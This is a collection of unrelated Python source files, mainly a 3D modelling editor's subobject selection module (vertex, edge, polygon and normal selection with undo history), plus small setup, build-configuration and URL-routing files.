if __name__ == "__main__":
# Command line arguments
parser = argparse.ArgumentParser()
parser.add_argument(
'--env',
type=str,
default='LunarLanderContinuous-v2',
help='name of registered gym environment',
)
args = parser.parse_args()
hyperparameter_search(args.env)
|
StarcoderdataPython
|
3289596
|
from distutils.core import setup
setup(
name='py-synology',
version='0.5.1',
packages=['synology'],
url='https://github.com/metronidazole/py-synology',
license='MIT',
author='snjoetw, metronidazole',
author_email='',
description='Python API for Synology Surveillance Station (DSM7)',
requires=['requests']
)
|
StarcoderdataPython
|
8110931
|
<gh_stars>1-10
##############################################################################
## Copyright (C) 1999-2006 Michigan State University ##
## Based on work Copyright (C) 1993-2003 California Institute of Technology ##
## ##
## Read the COPYING and README files, or contact '<EMAIL>', ##
## before continuing. SOME RESTRICTIONS MAY APPLY TO USE OF THIS FILE. ##
##############################################################################
import sys
import SCons
import CmdLineOpts, SConsOpts, StaticHelp, TestUtil
def Configure(args, env):
env.Replace(AvidaUtils_path = __path__)
# Load platform-specific configuration and default options.
env.Tool('PlatformTool', toolpath = __path__)
# Load custom options file: if user specified the customOptions
# option, figure out what custom options file they want to use,
# otherwise use the default one.
#
# This step uses platform-specific defaults defined in the
# 'PlatformTool', so must run after the 'PlatformTool' has been
# loaded.
#
env.Replace(default_custom_options_filename = 'my_avida_build_options.py')
custom_options = args.get('customOptions', env.subst('$default_custom_options_filename'))
if custom_options not in ['None', 'none']:
print "Reading custom options from file '%s' ..." % custom_options
# Load command-line arguments into Options parser.
opts = SCons.Options.Options([custom_options], args)
# Parses Avida-specific command-line arguments, loads default values
# for options not specified at the command line, and creates help text
# for available options.
#
CmdLineOpts.Update(opts, env)
SConsOpts.Update(env)
# Load various customized build tools.
#
# Some of these can be tweaked by our custom command-line options, so
# must be loaded after command-line arguments are parsed.
#
if env['enablePyPkg'] in ('True', '1', 1):
env.Tool('GCCXMLTool', toolpath = __path__)
env.Tool('PythonTool', toolpath = __path__)
env.Tool('BoostPythonTool', toolpath = __path__)
env.Tool('PysteTool', toolpath = __path__)
env.Tool('UnitTestTool', toolpath = __path__)
# Provide help text.
StaticHelp.GenerateStaticHelpText(env)
env.Help(opts.GenerateHelpText(env))
|
StarcoderdataPython
|
5128725
|
<reponame>benspaulding/django-shortwave
from django.conf.urls.defaults import *
urlpatterns = patterns('',
(r'^shortwave/', include('shortwave.urls')),
)
|
StarcoderdataPython
|
1680471
|
<gh_stars>10-100
from ...base import *
from .transform import TransformMixin
class SelectionMixin:
""" GeomDataObject class mix-in """
def __setstate__(self, state):
self._poly_selection_data = {"selected": [], "unselected": []}
self._selected_subobj_ids = {"vert": [], "edge": [], "poly": [], "normal": []}
def _edit_state(self, state):
del state["_poly_selection_data"]
del state["_selected_subobj_ids"]
def __init__(self):
self._poly_selection_data = {"selected": [], "unselected": []}
self._selected_subobj_ids = {"vert": [], "edge": [], "poly": [], "normal": []}
self._sel_subobj_ids_backup = {}
self._selection_backup = {}
def update_selection(self, subobj_type, subobjs_to_select, subobjs_to_deselect,
update_verts_to_transf=True, selection_colors=None, geom=None):
selected_subobj_ids = self._selected_subobj_ids[subobj_type]
geoms = self._geoms[subobj_type]
selected_subobjs = [subobj for subobj in subobjs_to_select
if subobj.id not in selected_subobj_ids]
deselected_subobjs = [subobj for subobj in subobjs_to_deselect
if subobj.id in selected_subobj_ids]
if not (selected_subobjs or deselected_subobjs):
return False
if subobj_type == "poly":
geom_selected = geoms["selected"]
geom_unselected = geoms["unselected"]
sel_data = self._poly_selection_data
data_selected = sel_data["selected"]
data_unselected = sel_data["unselected"]
prim = geom_selected.node().modify_geom(0).modify_primitive(0)
array_sel = prim.modify_vertices()
stride = array_sel.array_format.stride
size_sel = array_sel.get_num_rows()
row_count = sum([len(poly) for poly in selected_subobjs], size_sel)
array_sel.set_num_rows(row_count)
view_sel = memoryview(array_sel).cast("B")
prim = geom_unselected.node().modify_geom(0).modify_primitive(0)
array_unsel = prim.modify_vertices()
size_unsel = array_unsel.get_num_rows()
row_count = sum([len(poly) for poly in deselected_subobjs], size_unsel)
array_unsel.set_num_rows(row_count)
view_unsel = memoryview(array_unsel).cast("B")
polys_sel = []
polys_unsel = []
row_ranges_sel_to_keep = SparseArray()
row_ranges_sel_to_keep.set_range(0, array_sel.get_num_rows())
row_ranges_unsel_to_keep = SparseArray()
row_ranges_unsel_to_keep.set_range(0, size_unsel)
row_ranges_sel_to_move = SparseArray()
row_ranges_unsel_to_move = SparseArray()
for poly in selected_subobjs:
selected_subobj_ids.append(poly.id)
start = data_unselected.index(poly[0]) * 3
polys_sel.append((start, poly))
row_ranges_unsel_to_keep.clear_range(start, len(poly))
row_ranges_unsel_to_move.set_range(start, len(poly))
for poly in deselected_subobjs:
selected_subobj_ids.remove(poly.id)
start = data_selected.index(poly[0]) * 3
polys_unsel.append((start, poly))
row_ranges_sel_to_keep.clear_range(start, len(poly))
row_ranges_sel_to_move.set_range(start, len(poly))
polys_sel.sort()
polys_unsel.sort()
for _, poly in polys_sel:
data_selected.extend(poly)
for vert_ids in poly:
data_unselected.remove(vert_ids)
for _, poly in polys_unsel:
data_unselected.extend(poly)
for vert_ids in poly:
data_selected.remove(vert_ids)
f = lambda values, stride: (v * stride for v in values)
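            # f converts row counts/indices into byte offsets (stride = bytes per vertex row) for the memoryview slices below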
for i in range(row_ranges_unsel_to_move.get_num_subranges()):
start = row_ranges_unsel_to_move.get_subrange_begin(i)
size = row_ranges_unsel_to_move.get_subrange_end(i) - start
offset_, start_, size_ = f((size_sel, start, size), stride)
view_sel[offset_:offset_+size_] = view_unsel[start_:start_+size_]
size_sel += size
size_unsel -= size
offset = 0
for i in range(row_ranges_unsel_to_keep.get_num_subranges()):
start = row_ranges_unsel_to_keep.get_subrange_begin(i)
size = row_ranges_unsel_to_keep.get_subrange_end(i) - start
offset_, start_, size_ = f((offset, start, size), stride)
view_unsel[offset_:offset_+size_] = view_unsel[start_:start_+size_]
offset += size
for i in range(row_ranges_sel_to_move.get_num_subranges()):
start = row_ranges_sel_to_move.get_subrange_begin(i)
size = row_ranges_sel_to_move.get_subrange_end(i) - start
offset_, start_, size_ = f((size_unsel, start, size), stride)
view_unsel[offset_:offset_+size_] = view_sel[start_:start_+size_]
size_unsel += size
size_sel -= size
offset = 0
for i in range(row_ranges_sel_to_keep.get_num_subranges()):
start = row_ranges_sel_to_keep.get_subrange_begin(i)
size = row_ranges_sel_to_keep.get_subrange_end(i) - start
offset_, start_, size_ = f((offset, start, size), stride)
view_sel[offset_:offset_+size_] = view_sel[start_:start_+size_]
offset += size
array_sel.set_num_rows(size_sel)
array_unsel.set_num_rows(size_unsel)
else:
if subobj_type == "vert":
combined_subobjs = self.merged_verts
elif subobj_type == "edge":
combined_subobjs = self.merged_edges
elif subobj_type == "normal":
combined_subobjs = self.shared_normals
selected_subobjs = set(combined_subobjs[subobj.id] for subobj in selected_subobjs)
deselected_subobjs = set(combined_subobjs[subobj.id] for subobj in deselected_subobjs)
sel_state_geom = geom if geom else geoms["sel_state"]
vertex_data = sel_state_geom.node().modify_geom(0).modify_vertex_data()
col_writer = GeomVertexWriter(vertex_data, "color")
if selection_colors:
sel_colors = selection_colors
else:
sel_colors = Mgr.get("subobj_selection_colors")[subobj_type]
color_sel = sel_colors["selected"]
color_unsel = sel_colors["unselected"]
for combined_subobj in selected_subobjs:
selected_subobj_ids.extend(combined_subobj)
for row_index in combined_subobj.row_indices:
col_writer.set_row(row_index)
col_writer.set_data4(color_sel)
for combined_subobj in deselected_subobjs:
for subobj_id in combined_subobj:
selected_subobj_ids.remove(subobj_id)
for row_index in combined_subobj.row_indices:
col_writer.set_row(row_index)
col_writer.set_data4(color_unsel)
if subobj_type == "normal":
selected_normal_ids = []
deselected_normal_ids = []
for combined_subobj in selected_subobjs:
selected_normal_ids.extend(combined_subobj)
for combined_subobj in deselected_subobjs:
deselected_normal_ids.extend(combined_subobj)
self.update_locked_normal_selection(selected_normal_ids, deselected_normal_ids)
if update_verts_to_transf:
self._update_verts_to_transform(subobj_type)
return True
def is_selected(self, subobj):
return subobj.id in self._selected_subobj_ids[subobj.type]
def get_selection(self, subobj_lvl):
selected_subobj_ids = self._selected_subobj_ids[subobj_lvl]
if subobj_lvl == "poly":
polys = self._subobjs["poly"]
return [polys[poly_id] for poly_id in selected_subobj_ids]
if subobj_lvl == "vert":
combined_subobjs = self.merged_verts
elif subobj_lvl == "edge":
combined_subobjs = self.merged_edges
elif subobj_lvl == "normal":
combined_subobjs = self.shared_normals
return list(set(combined_subobjs[subobj_id] for subobj_id in selected_subobj_ids))
def create_selection_backup(self, subobj_lvl):
if subobj_lvl in self._selection_backup:
return
self._sel_subobj_ids_backup[subobj_lvl] = self._selected_subobj_ids[subobj_lvl][:]
self._selection_backup[subobj_lvl] = self.get_selection(subobj_lvl)
def restore_selection_backup(self, subobj_lvl):
sel_backup = self._selection_backup
if subobj_lvl not in sel_backup:
return
self.clear_selection(subobj_lvl, False)
self.update_selection(subobj_lvl, sel_backup[subobj_lvl], [], False)
del sel_backup[subobj_lvl]
del self._sel_subobj_ids_backup[subobj_lvl]
def remove_selection_backup(self, subobj_lvl):
sel_backup = self._selection_backup
if subobj_lvl in sel_backup:
del sel_backup[subobj_lvl]
del self._sel_subobj_ids_backup[subobj_lvl]
def clear_selection(self, subobj_lvl, update_verts_to_transf=True, force=False):
if not (force or self._selected_subobj_ids[subobj_lvl]):
return
geoms = self._geoms[subobj_lvl]
if subobj_lvl == "poly":
geom_selected = geoms["selected"]
geom_unselected = geoms["unselected"]
sel_data = self._poly_selection_data
sel_data["unselected"].extend(sel_data["selected"])
sel_data["selected"] = []
from_array = geom_selected.node().modify_geom(0).modify_primitive(0).modify_vertices()
from_size = from_array.data_size_bytes
from_view = memoryview(from_array).cast("B")
to_array = geom_unselected.node().modify_geom(0).modify_primitive(0).modify_vertices()
to_size = to_array.data_size_bytes
to_array.set_num_rows(to_array.get_num_rows() + from_array.get_num_rows())
to_view = memoryview(to_array).cast("B")
to_view[to_size:to_size+from_size] = from_view
from_array.clear_rows()
elif subobj_lvl == "normal":
color = Mgr.get("subobj_selection_colors")["normal"]["unselected"]
color_locked = Mgr.get("subobj_selection_colors")["normal"]["locked_unsel"]
vertex_data = geoms["sel_state"].node().modify_geom(0).modify_vertex_data()
col_writer = GeomVertexWriter(vertex_data, "color")
verts = self._subobjs["vert"]
for vert_id in self._selected_subobj_ids["normal"]:
vert = verts[vert_id]
row = vert.row_index
col = color_locked if vert.has_locked_normal() else color
col_writer.set_row(row)
col_writer.set_data4(col)
else:
vertex_data = geoms["sel_state"].node().modify_geom(0).modify_vertex_data()
color = Mgr.get("subobj_selection_colors")[subobj_lvl]["unselected"]
new_data = vertex_data.set_color(color)
vertex_data.set_array(1, new_data.arrays[1])
self._selected_subobj_ids[subobj_lvl] = []
if update_verts_to_transf:
self._verts_to_transf[subobj_lvl] = {}
def delete_selection(self, subobj_lvl, unregister_globally=True, unregister_locally=True):
subobjs = self._subobjs
verts = subobjs["vert"]
edges = subobjs["edge"]
polys = subobjs["poly"]
selected_subobj_ids = self._selected_subobj_ids
selected_vert_ids = selected_subobj_ids["vert"]
selected_edge_ids = selected_subobj_ids["edge"]
selected_poly_ids = selected_subobj_ids["poly"]
if subobj_lvl == "vert":
polys_to_delete = set()
for vert in (verts[v_id] for v_id in selected_vert_ids):
polys_to_delete.add(polys[vert.polygon_id])
elif subobj_lvl == "edge":
polys_to_delete = set()
for edge in (edges[e_id] for e_id in selected_edge_ids):
polys_to_delete.add(polys[edge.polygon_id])
elif subobj_lvl == "poly":
polys_to_delete = [polys[poly_id] for poly_id in selected_poly_ids]
self.delete_polygons(polys_to_delete, unregister_globally, unregister_locally)
def _restore_subobj_selection(self, time_id):
obj_id = self.toplevel_obj.id
prop_id = self._unique_prop_ids["subobj_selection"]
data = Mgr.do("load_last_from_history", obj_id, prop_id, time_id)
verts = self._subobjs["vert"]
normal_ids = data["normal"]
old_sel_normal_ids = set(self._selected_subobj_ids["normal"])
new_sel_normal_ids = set(normal_ids)
sel_normal_ids = new_sel_normal_ids - old_sel_normal_ids
unsel_normal_ids = old_sel_normal_ids - new_sel_normal_ids
unsel_normal_ids.intersection_update(verts)
shared_normals = self.shared_normals
original_shared_normals = {}
if unsel_normal_ids:
tmp_shared_normal = Mgr.do("create_shared_normal", self, unsel_normal_ids)
unsel_id = tmp_shared_normal.id
original_shared_normals[unsel_id] = shared_normals[unsel_id]
shared_normals[unsel_id] = tmp_shared_normal
unsel_normals = [tmp_shared_normal]
else:
unsel_normals = []
if sel_normal_ids:
tmp_shared_normal = Mgr.do("create_shared_normal", self, sel_normal_ids)
sel_id = tmp_shared_normal.id
original_shared_normals[sel_id] = shared_normals[sel_id]
shared_normals[sel_id] = tmp_shared_normal
sel_normals = [tmp_shared_normal]
else:
sel_normals = []
self.update_selection("normal", sel_normals, unsel_normals, False)
if unsel_normals:
shared_normals[unsel_id] = original_shared_normals[unsel_id]
if sel_normals:
shared_normals[sel_id] = original_shared_normals[sel_id]
self._update_verts_to_transform("normal")
for subobj_type in ("vert", "edge", "poly"):
subobjs = self._subobjs[subobj_type]
subobj_ids = data[subobj_type]
old_sel_subobj_ids = set(self._selected_subobj_ids[subobj_type])
new_sel_subobj_ids = set(subobj_ids)
sel_subobj_ids = new_sel_subobj_ids - old_sel_subobj_ids
unsel_subobj_ids = old_sel_subobj_ids - new_sel_subobj_ids
unsel_subobj_ids.intersection_update(subobjs)
unsel_subobjs = [subobjs[i] for i in unsel_subobj_ids]
sel_subobjs = [subobjs[i] for i in sel_subobj_ids]
if subobj_type in ("vert", "edge"):
merged_subobjs = self.merged_verts if subobj_type == "vert" else self.merged_edges
original_merged_subobjs = {}
if unsel_subobjs:
tmp_merged_subobj = Mgr.do(f"create_merged_{subobj_type}", self)
for subobj_id in unsel_subobj_ids:
tmp_merged_subobj.append(subobj_id)
unsel_id = tmp_merged_subobj.id
original_merged_subobjs[unsel_id] = merged_subobjs[unsel_id]
merged_subobjs[unsel_id] = tmp_merged_subobj
unsel_subobjs = [subobjs[unsel_id]]
if sel_subobjs:
tmp_merged_subobj = Mgr.do(f"create_merged_{subobj_type}", self)
for subobj_id in sel_subobj_ids:
tmp_merged_subobj.append(subobj_id)
sel_id = tmp_merged_subobj.id
original_merged_subobjs[sel_id] = merged_subobjs[sel_id]
merged_subobjs[sel_id] = tmp_merged_subobj
sel_subobjs = [subobjs[sel_id]]
self.update_selection(subobj_type, sel_subobjs, unsel_subobjs, False)
if subobj_type in ("vert", "edge"):
if unsel_subobjs:
merged_subobjs[unsel_id] = original_merged_subobjs[unsel_id]
if sel_subobjs:
merged_subobjs[sel_id] = original_merged_subobjs[sel_id]
self._update_verts_to_transform(subobj_type)
class Selection(TransformMixin):
def __init__(self, obj_level, subobjs):
TransformMixin.__init__(self)
self._objs = subobjs
self._obj_level = obj_level
self._groups = {}
for obj in subobjs:
self._groups.setdefault(obj.geom_data_obj, []).append(obj)
def __getitem__(self, index):
try:
return self._objs[index]
except IndexError:
raise IndexError("Index out of range.")
except TypeError:
raise TypeError("Index must be an integer value.")
def __len__(self):
return len(self._objs)
def get_geom_data_objects(self):
return list(self._groups)
def get_toplevel_objects(self, get_group=False):
return [geom_data_obj.get_toplevel_object(get_group) for geom_data_obj in self._groups]
def get_toplevel_object(self, get_group=False):
""" Return a random top-level object """
if self._groups:
return list(self._groups.keys())[0].get_toplevel_object(get_group)
@property
def toplevel_obj(self):
return self.get_toplevel_object()
def get_subobjects(self, geom_data_obj):
return self._groups.get(geom_data_obj, [])
def update(self, hide_sets=False):
self.update_center_pos()
self.update_ui()
if hide_sets:
Mgr.update_remotely("selection_set", "hide_name")
def add(self, subobjs, add_to_hist=True):
sel = self._objs
old_sel = set(sel)
sel_to_add = set(subobjs)
common = old_sel & sel_to_add
if common:
sel_to_add -= common
if not sel_to_add:
return False
geom_data_objs = {}
groups = self._groups
for obj in sel_to_add:
geom_data_obj = obj.geom_data_obj
geom_data_objs.setdefault(geom_data_obj, []).append(obj)
groups.setdefault(geom_data_obj, []).append(obj)
for geom_data_obj, objs in geom_data_objs.items():
geom_data_obj.update_selection(self._obj_level, objs, [])
sel.extend(sel_to_add)
task = lambda: Mgr.get("selection").update()
PendingTasks.add(task, "update_selection", "ui")
if add_to_hist:
subobj_descr = {"vert": "vertex", "edge": "edge", "poly": "polygon", "normal": "normal"}
event_descr = f'Add to {subobj_descr[self._obj_level]} selection'
obj_data = {}
event_data = {"objects": obj_data}
for geom_data_obj in geom_data_objs:
obj = geom_data_obj.toplevel_obj
obj_data[obj.id] = geom_data_obj.get_data_to_store("prop_change", "subobj_selection")
# make undo/redoable
Mgr.do("add_history", event_descr, event_data)
return True
def remove(self, subobjs, add_to_hist=True):
sel = self._objs
old_sel = set(sel)
sel_to_remove = set(subobjs)
common = old_sel & sel_to_remove
if not common:
return False
geom_data_objs = {}
groups = self._groups
for obj in common:
sel.remove(obj)
geom_data_obj = obj.geom_data_obj
geom_data_objs.setdefault(geom_data_obj, []).append(obj)
groups[geom_data_obj].remove(obj)
if not groups[geom_data_obj]:
del groups[geom_data_obj]
for geom_data_obj, objs in geom_data_objs.items():
geom_data_obj.update_selection(self._obj_level, [], objs)
task = lambda: Mgr.get("selection").update()
PendingTasks.add(task, "update_selection", "ui")
if add_to_hist:
subobj_descr = {"vert": "vertex", "edge": "edge", "poly": "polygon", "normal": "normal"}
event_descr = f'Remove from {subobj_descr[self._obj_level]} selection'
obj_data = {}
event_data = {"objects": obj_data}
for geom_data_obj in geom_data_objs:
obj = geom_data_obj.toplevel_obj
obj_data[obj.id] = geom_data_obj.get_data_to_store("prop_change", "subobj_selection")
# make undo/redoable
Mgr.do("add_history", event_descr, event_data)
return True
def replace(self, subobjs, add_to_hist=True):
sel = self._objs
old_sel = set(sel)
new_sel = set(subobjs)
common = old_sel & new_sel
if common:
old_sel -= common
new_sel -= common
if not (old_sel or new_sel):
return False
geom_data_objs = {}
for old_obj in old_sel:
sel.remove(old_obj)
geom_data_obj = old_obj.geom_data_obj
geom_data_objs.setdefault(geom_data_obj, {"sel": [], "desel": []})["desel"].append(old_obj)
for new_obj in new_sel:
geom_data_obj = new_obj.geom_data_obj
geom_data_objs.setdefault(geom_data_obj, {"sel": [], "desel": []})["sel"].append(new_obj)
for geom_data_obj, objs in geom_data_objs.items():
geom_data_obj.update_selection(self._obj_level, objs["sel"], objs["desel"])
sel.extend(new_sel)
self._groups = groups = {}
for obj in common | new_sel:
groups.setdefault(obj.geom_data_obj, []).append(obj)
task = lambda: Mgr.get("selection").update()
PendingTasks.add(task, "update_selection", "ui")
if add_to_hist and geom_data_objs:
subobj_descr = {"vert": "vertex", "edge": "edge", "poly": "polygon", "normal": "normal"}
event_descr = f'Replace {subobj_descr[self._obj_level]} selection'
obj_data = {}
event_data = {"objects": obj_data}
for geom_data_obj in geom_data_objs:
obj = geom_data_obj.toplevel_obj
obj_data[obj.id] = geom_data_obj.get_data_to_store("prop_change", "subobj_selection")
# make undo/redoable
Mgr.do("add_history", event_descr, event_data)
return True
def clear(self, add_to_hist=True):
if not self._objs:
return False
obj_lvl = self._obj_level
geom_data_objs = []
for geom_data_obj in self._groups:
geom_data_obj.clear_selection(obj_lvl)
geom_data_objs.append(geom_data_obj)
self._groups = {}
self._objs = []
task = lambda: Mgr.get("selection").update()
PendingTasks.add(task, "update_selection", "ui")
if add_to_hist:
subobj_descr = {"vert": "vertex", "edge": "edge", "poly": "polygon", "normal": "normal"}
event_descr = f'Clear {subobj_descr[obj_lvl]} selection'
obj_data = {}
event_data = {"objects": obj_data}
for geom_data_obj in geom_data_objs:
obj = geom_data_obj.toplevel_obj
obj_data[obj.id] = geom_data_obj.get_data_to_store("prop_change", "subobj_selection")
# make undo/redoable
Mgr.do("add_history", event_descr, event_data)
return True
def delete(self, add_to_hist=True):
obj_lvl = self._obj_level
if obj_lvl == "normal":
return False
if not self._objs:
return False
geom_data_objs = list(self._groups.keys())
self._groups = {}
self._objs = []
task = lambda: Mgr.get("selection").update()
PendingTasks.add(task, "update_selection", "ui")
for geom_data_obj in geom_data_objs:
geom_data_obj.delete_selection(obj_lvl)
if add_to_hist:
Mgr.do("update_history_time")
subobj_descr = {"vert": "vertex", "edge": "edge", "poly": "polygon", "normal": "normal"}
event_descr = f'Delete {subobj_descr[obj_lvl]} selection'
obj_data = {}
event_data = {"objects": obj_data}
for geom_data_obj in geom_data_objs:
obj = geom_data_obj.toplevel_obj
obj_data[obj.id] = geom_data_obj.get_data_to_store("subobj_change")
# make undo/redoable
Mgr.do("add_history", event_descr, event_data, update_time_id=False)
return True
# subobject selection manager
class SelectionManager:
def __init__(self):
self._color_id = None
self._selections = {}
self._prev_obj_lvl = None
self._next_selection = None
self._selection_op = "replace"
# the following variables are used to pick a subobject using its polygon
self._picked_poly = None
self._tmp_color_id = None
self._cursor_id = ""
self._pixel_under_mouse = None
self._aux_pixel_under_mouse = None
np = NodePath("poly_sel_state")
poly_sel_state_off = np.get_state()
tex_stage = TextureStage("poly_selection")
tex_stage.sort = 100
tex_stage.priority = -1
tex_stage.mode = TextureStage.M_add
np.set_transparency(TransparencyAttrib.M_none)
projector = GD.cam.projector
np.set_tex_gen(tex_stage, RenderAttrib.M_world_position)
np.set_tex_projector(tex_stage, GD.world, projector)
tex = Texture()
tex.read(Filename(GFX_PATH + "sel_tex.png"))
np.set_texture(tex_stage, tex)
red = VBase4(1., 0., 0., 1.)
material = Material("poly_selection")
material.diffuse = red
material.emission = red * .3
np.set_material(material)
poly_sel_state = np.get_state()
poly_sel_effects = np.get_effects()
color = VBase4(0., .7, .5, 1.)
material = Material("temp_poly_selection")
material.diffuse = color
material.emission = color * .3
np.set_material(material)
tmp_poly_sel_state = np.get_state()
Mgr.expose("poly_selection_state_off", lambda: poly_sel_state_off)
Mgr.expose("poly_selection_state", lambda: poly_sel_state)
Mgr.expose("poly_selection_effects", lambda: poly_sel_effects)
Mgr.expose("temp_poly_selection_state", lambda: tmp_poly_sel_state)
vert_colors = {"selected": (1., 0., 0., 1.), "unselected": (.5, .5, 1., 1.)}
edge_colors = {"selected": (1., 0., 0., 1.), "unselected": (1., 1., 1., 1.)}
normal_colors = {"selected": (1., 0.3, 0.3, 1.), "unselected": (.75, .75, 0., 1.),
"locked_sel": (0.75, 0.3, 1., 1.), "locked_unsel": (0.3, 0.5, 1., 1.)}
subobj_sel_colors = {"vert": vert_colors, "edge": edge_colors, "normal": normal_colors}
Mgr.expose("subobj_selection_colors", lambda: subobj_sel_colors)
Mgr.expose("selection_vert", lambda: self._selections["vert"])
Mgr.expose("selection_edge", lambda: self._selections["edge"])
Mgr.expose("selection_poly", lambda: self._selections["poly"])
Mgr.expose("selection_normal", lambda: self._selections["normal"])
Mgr.expose("subobj_selection_set", self.__get_selection_set)
Mgr.accept("update_selection_vert", lambda: self.__update_selection("vert"))
Mgr.accept("update_selection_edge", lambda: self.__update_selection("edge"))
Mgr.accept("update_selection_poly", lambda: self.__update_selection("poly"))
Mgr.accept("update_selection_normal", lambda: self.__update_selection("normal"))
Mgr.accept("select_vert", lambda *args: self.__init_select("vert", *args))
Mgr.accept("select_edge", lambda *args: self.__init_select("edge", *args))
Mgr.accept("select_poly", lambda *args: self.__init_select("poly", *args))
Mgr.accept("select_normal", lambda *args: self.__init_select("normal", *args))
Mgr.accept("select_single_vert", lambda: self.__select_single("vert"))
Mgr.accept("select_single_edge", lambda: self.__select_single("edge"))
Mgr.accept("select_single_poly", lambda: self.__select_single("poly"))
Mgr.accept("select_single_normal", lambda: self.__select_single("normal"))
Mgr.accept("inverse_select_subobjs", self.__inverse_select)
Mgr.accept("select_all_subobjs", self.__select_all)
Mgr.accept("clear_subobj_selection", self.__select_none)
Mgr.accept("apply_subobj_selection_set", self.__apply_selection_set)
Mgr.accept("region_select_subobjs", self.__region_select)
Mgr.accept("init_selection_via_poly", self.__init_selection_via_poly)
Mgr.add_app_updater("active_obj_level", lambda: self.__clear_prev_selection(True))
Mgr.add_app_updater("picking_via_poly", self.__set_subobj_picking_via_poly)
Mgr.add_app_updater("subobj_sel_conversion", self.__convert_subobj_selection)
Mgr.add_app_updater("viewport", self.__handle_viewport_resize)
add_state = Mgr.add_state
add_state("picking_via_poly", -1, self.__init_subobj_picking_via_poly)
bind = Mgr.bind_state
bind("picking_via_poly", "select subobj via poly",
"mouse1-up", self.__select_subobj_via_poly)
bind("picking_via_poly", "cancel subobj select via poly",
"mouse3", self.__cancel_select_via_poly)
status_data = GD["status"]
info = "LMB-drag over subobject to pick it; RMB to cancel"
status_data["picking_via_poly"] = {"mode": "Pick subobject", "info": info}
def __handle_viewport_resize(self):
# Maintain the size and aspect ratio of the polygon selection texture.
w, h = GD["viewport"]["size_aux" if GD["viewport"][2] == "main" else "size"]
lenses = GD.cam.projector_lenses
lens_persp = lenses["persp"]
lens_persp.fov = 2. * math.degrees(math.atan(2.5 / max(w, h)))
lens_ortho = lenses["ortho"]
lens_ortho.film_size = 2000. / max(w, h)
def __clear_prev_selection(self, check_top=False):
obj_lvl = GD["active_obj_level"]
if check_top and obj_lvl != "top":
return
if self._prev_obj_lvl:
self._selections[self._prev_obj_lvl] = None
self._prev_obj_lvl = None
selection = Mgr.get("selection_top")
sel_count = len(selection)
obj = selection[0]
geom_data_obj = obj.geom_obj.geom_data_obj
for prop_id in geom_data_obj.get_type_property_ids(obj_lvl):
value = geom_data_obj.get_property(prop_id, for_remote_update=True, obj_lvl=obj_lvl)
value = (value, sel_count)
Mgr.update_remotely("selected_obj_prop", "unlocked_geom", prop_id, value)
def __update_selection(self, obj_lvl):
self.__clear_prev_selection()
subobjs = []
for obj in Mgr.get("selection_top"):
subobjs.extend(obj.get_subobj_selection(obj_lvl))
self._selections[obj_lvl] = sel = Selection(obj_lvl, subobjs)
if self._next_selection is not None:
sel.replace(self._next_selection)
self._next_selection = None
sel.update()
self._prev_obj_lvl = obj_lvl
Mgr.update_remotely("selection_set", "hide_name")
def __get_all_combined_subobjs(self, obj_lvl):
subobjs = []
geom_data_objs = [m.geom_obj.geom_data_obj for m in Mgr.get("selection_top")]
if obj_lvl == "vert":
for geom_data_obj in geom_data_objs:
subobjs.extend(geom_data_obj.merged_verts.values())
elif obj_lvl == "edge":
for geom_data_obj in geom_data_objs:
subobjs.extend(geom_data_obj.merged_edges.values())
elif obj_lvl == "normal":
for geom_data_obj in geom_data_objs:
subobjs.extend(geom_data_obj.shared_normals.values())
elif obj_lvl == "poly":
for geom_data_obj in geom_data_objs:
subobjs.extend(geom_data_obj.get_subobjects("poly").values())
return subobjs
def __inverse_select(self):
obj_lvl = GD["active_obj_level"]
selection = self._selections[obj_lvl]
old_sel = set(selection)
new_sel = set(self.__get_all_combined_subobjs(obj_lvl))
selection.replace(new_sel - old_sel)
Mgr.update_remotely("selection_set", "hide_name")
def __select_all(self):
obj_lvl = GD["active_obj_level"]
selection = self._selections[obj_lvl]
selection.replace(self.__get_all_combined_subobjs(obj_lvl))
Mgr.update_remotely("selection_set", "hide_name")
def __select_none(self):
obj_lvl = GD["active_obj_level"]
selection = self._selections[obj_lvl]
selection.clear()
Mgr.update_remotely("selection_set", "hide_name")
def __get_selection_set(self):
obj_lvl = GD["active_obj_level"]
selection = self._selections[obj_lvl]
if obj_lvl == "poly":
return set(obj.id for obj in selection)
else:
return set(obj_id for obj in selection for obj_id in obj)
def __apply_selection_set(self, sel_set):
obj_lvl = GD["active_obj_level"]
selection = self._selections[obj_lvl]
geom_data_objs = [m.geom_obj.geom_data_obj for m in Mgr.get("selection_top")]
combined_subobjs = {}
if obj_lvl == "vert":
for geom_data_obj in geom_data_objs:
combined_subobjs.update(geom_data_obj.merged_verts)
elif obj_lvl == "edge":
for geom_data_obj in geom_data_objs:
combined_subobjs.update(geom_data_obj.merged_edges)
elif obj_lvl == "normal":
for geom_data_obj in geom_data_objs:
combined_subobjs.update(geom_data_obj.shared_normals)
elif obj_lvl == "poly":
for geom_data_obj in geom_data_objs:
combined_subobjs.update(geom_data_obj.get_subobjects("poly"))
new_sel = set(combined_subobjs.get(obj_id) for obj_id in sel_set)
new_sel.discard(None)
selection.replace(new_sel)
def __init_select(self, obj_lvl, picked_obj, op):
self._selection_op = op
if obj_lvl == "vert":
if GD["subobj_edit_options"]["pick_via_poly"]:
obj = picked_obj if picked_obj and picked_obj.type == "poly" else None
self._picked_poly = obj
else:
obj = picked_obj.merged_vertex if picked_obj else None
elif obj_lvl == "edge":
if GD["subobj_edit_options"]["pick_via_poly"]:
obj = picked_obj if picked_obj and picked_obj.type == "poly" else None
if obj and GD["subobj_edit_options"]["sel_edges_by_border"]:
merged_edges = obj.geom_data_obj.merged_edges
for edge_id in obj.edge_ids:
if len(merged_edges[edge_id]) == 1:
break
else:
obj = None
self._picked_poly = obj
else:
obj = picked_obj.merged_edge if picked_obj else None
if obj and GD["subobj_edit_options"]["sel_edges_by_border"] and len(obj) > 1:
obj = None
elif obj_lvl == "normal":
if GD["subobj_edit_options"]["pick_via_poly"]:
obj = picked_obj if picked_obj and picked_obj.type == "poly" else None
self._picked_poly = obj
else:
obj = picked_obj.shared_normal if picked_obj else None
elif obj_lvl == "poly":
obj = picked_obj
if self._picked_poly:
Mgr.enter_state("picking_via_poly")
return False, False
self._color_id = obj.picking_color_id if obj else None
r = self.__select(obj_lvl)
selection = self._selections[obj_lvl]
if not (obj and obj in selection):
obj = selection[0] if selection else None
if obj:
cs_type = GD["coord_sys_type"]
tc_type = GD["transf_center_type"]
toplvl_obj = obj.toplevel_obj
if cs_type == "local":
Mgr.update_locally("coord_sys", cs_type, toplvl_obj)
if tc_type == "pivot":
Mgr.update_locally("transf_center", tc_type, toplvl_obj)
return r
